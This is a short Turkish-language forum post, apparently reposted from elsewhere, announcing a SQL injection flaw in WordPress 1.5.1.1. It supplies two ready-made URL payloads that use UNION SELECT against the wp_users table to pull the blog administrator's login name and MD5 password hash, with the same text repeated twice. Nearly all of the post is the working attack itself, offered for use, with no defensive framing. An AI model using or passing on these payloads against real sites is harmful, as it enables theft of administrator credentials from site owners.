Cypherpunk
New member
WordPress Blog scriptinin 1.5.1.1 versiyonunda (son versiyon 1.5.1.2) yapılandırma yanlışlığında doğan SQL Injection açıkları mevcuttur.
Bu açık kullanılarak Blog Admininin kullanıcı adı ve şifresinin md5 hashine ulaşmak mümkün.
Örnek Kullanım:
Not : Boşluklar yok.
[Alıntıdır]
Bu açık kullanılarak Blog Admininin kullanıcı adı ve şifresinin md5 hashine ulaşmak mümkün.
Örnek Kullanım:
Kod:
QUOTE:
index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58 ),user_pass,CHAR(58 ),user_login,CHAR(58 ))%20FROM%20wp_users/*
Kod:
QUOTE:
index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58 ),user_pass,CHAR(58 ),user_login,CHAR(58 )),null,null,null%20FROM%20wp_users/**
Not : Boşluklar yok.
[Alıntıdır]